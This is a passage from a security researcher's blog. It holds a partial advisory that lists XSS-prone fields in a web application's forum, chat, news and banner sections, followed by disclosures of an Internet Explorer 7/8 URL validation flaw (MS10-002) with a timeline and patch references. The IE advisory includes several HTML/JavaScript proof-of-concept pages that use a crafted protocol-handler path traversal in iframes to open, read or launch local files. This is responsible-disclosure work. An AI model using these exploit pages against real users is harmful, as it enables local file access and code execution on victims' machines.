and wen a victim try to browse the forum the xss is
executed, also the attacker can compose a search url
with xss in filter variable or put the xss in search
form field to execute it.

##################
Chat room
###################

Nickname form field affected

a attacker can use a malformed nick name with xss and
wen he join in a channel the xss is executed in all
channel´s users.

######################
News
####################

Title form filed affected

a attacker can compose a new with a malformed title and
wen a user browse the news sections the xss is executed
also if the new has a "resume" in home page, all users
wen load the page are afected by xss.

pg variable affected

a attacker can compose a malformed URL in news sections and
insert some xss code in 'pg' variable , wen a victim clink in
this url the xss is executed.

#########################
banners section
#########################

Title and label form fields

A remote user can add a banner
with a malformed title or/and malformed label
wen the attacker visit his banner the xss is executed
in his own banner management.
Also if a victim visit this banner the xss is executed.

############################€ND#############################

Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Internet explorer 7 & 8 URL Validation Vulnerability

Wednesday, February 10, 2010
############################################
Internet explorer 7 & 8 url validation vulnerability
Original Advisore: http://lostmon.blogspot.com/
2010/02/internet-explorer-7-8-url-validation.html
Vendor URl: http://www.microsoft.com
related adv:http://lostmon.blogspot.com/
2010/02/internet-explorer-6-7-8-url-validation.html
related bulletin: MS10-002 and ms10-007
Related CVE 2010-0027
Related OSVDB ID: 62245 and 62245
Related Secunia: SA38501 and SA38209
Related BID: 37884
############################################


############
Description
############


A remote code execution vulnerability exists in the way
that Internet Explorer incorrectly validates input. An
attacker could exploit the vulnerability by constructing
a specially crafted URL. When a user clicks the URL, the
vulnerability could allow remote code execution. An
attacker who successfully exploited this vulnerability
could gain the same user rights as the logged-on user.
If a user is logged on with administrative user rights,


#################
Versions afected
#################

I have tested in Internet Explorer 7 & 8
in this versions of windows

All versions of Windows 7
Windows xp home
Windows xs pro

So you can look the explotability index
From Relared Microsoft bulletin to get
a complete List of products affected.

#############
Timeline
#############

discovered 05-11-2009
Reported to vendor 15-11-2009
Vendor response:15-11-2009
vendor accepts in case manager 19-11-2009
vendor patch 21-01-2010
Vendor Patch2:09-02-2010
Public Disclosure: 21-01-2010
Details Disclosure:10-02-2010


##############
Solution
##############

See
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx

for more details and for download vendor's patch

#######################
Sample code and PoC´s
#######################

This Vulnerability is bassed in the way
that Internet explorer validate Uri handlers
and the special chart '#'

for testing and undestanding first open internet explorer
and write in teh address bar a fake handler like `handler:'
it cause that IE shows 'res://ieframe.dll/unknownprotocol.htm'
internal page , because the protocol is unknow.
if we do => handler:http://[some-host]' Ie wait to open
the host, but don´t show any error or unknow protocol
error page.

If we Write at the adrress bar 'handler:handler2:'
IE shows again 'res://ieframe.dll/unknownprotocol.htm' page.

But if we concatenate two unknow protocol handlers and
use the special char '#' like 'handler:handler#:'
internet explorer shows a alert warning
with 'internet explorer can´t find file:///'

With this convination IE use file: protocol handler.

With this alert we can think... if we concatenate two handlers and #
char and a file path we can access to files on the hard disk.

"handler:handler#:c:\windows\calc.exe'
But we get again 'internet explorer can´t find the file'

Them we look for trasversal file access like
handler:handler#:../../../../C:\windows/calc.exe’
Them Ie promp us to download or execute the file.
we have bypass the restrictions!!!

so we are working in the address bar
Can a web page use this issue to make the same and ask
for download it ? YES

we can construct a web page with a iframe like:

############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################

If we open it via local folder, or via local server or
lan server or remote server, in all cases iE ask for download

them we can access any file in the hard disk so
can we execute or read the content of a file ?? YES

if we know a txt file path we can do similar
( put a txt file in c: root and wite some content it)
and them :

############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>

############# EOF #################

wen we open this Poc , it read the content from our_txtfile.txt
and show it in the frame.


we can execute files ?? YES

we can execute a html file or xml file or search-ms files
from hard disk for example:

############# PoC Tree ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>

############### EOF ###########

if we look it executes Explorer with a local search :D


can we read the content of any file and upload it to a server or
manage the content ??

i don´t have found a way to do it
all times internet explorer denies the access to the content from
iframe.

############# PoC four ##############

<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);

content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>

<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>

</body>
</html>

##################### EOF #############################

it give a access deniet error
if we look to use XMLHttpRequest()

it does not work again and access is denied:

########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(’GET’,
‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,
true);
req.send(”);
############ EOF #############

if we use it as a activex it
shows again a access denied :P

############### PoC six #############

<html><body><div>

<script>
function getHTTPObject()
{
if (typeof XMLHttpRequest != 'undefined')
{
return new XMLHttpRequest();
}
try {
return new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e)
{
try
{
return new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {}
}
return false;
}
x = getHTTPObject();
x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);
x.send(null);
alert(x.responseText);

</script>

</div></body></html>

################ EOF ######################

Them we can think that we can read txt files , execute html,xml
search-ms files , and download and execute Binaries files from the
victims hard disk , only with view a crafted web page.

Microsoft has pached it and has release a secutiry bulletin
that solve this issue see
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx
for details and for download the security update that solve this
issue and seven vulnerabilities more.

#################### €nd ################

Thnx to Google security Team for his support
Thnx to MSRC for his support and acknowledgments
Thnx To icar0 & sha0 from Badchecksum
Thnx To Brink For test with me in some windows :D
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Internet explorer 6 7 8 URL Validation Vulnerability

Thursday, January 21, 2010
###################################
Internet explorer 6 7 and 8 URL Validation Vulnerability
Vendor :http://www.Microsoft.com
Vendor notify:YES vendor confirmed :YES
REF Bulletin:MS10-002
#########################################

A remote code execution vulnerability exists in the way that Internet Explorer incorrectly validates input. An attacker could exploit the vulnerability by constructing a specially crafted URL. When a user clicks the URL, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see MS10-002 and CVE-2010-0027.

No more details at this time I have a PoC But At this moment it, is private.

Time Line for this vulnerability:

discovered 05-11-2009
Reported to vendor 15-11-2009
Vendor response:15-11-2009
vendor accepts in case manager 19-11-2009
vendor patch 21-01-2010

#################€nd#############

Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team For support
Thnx To MSRC for Support

atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...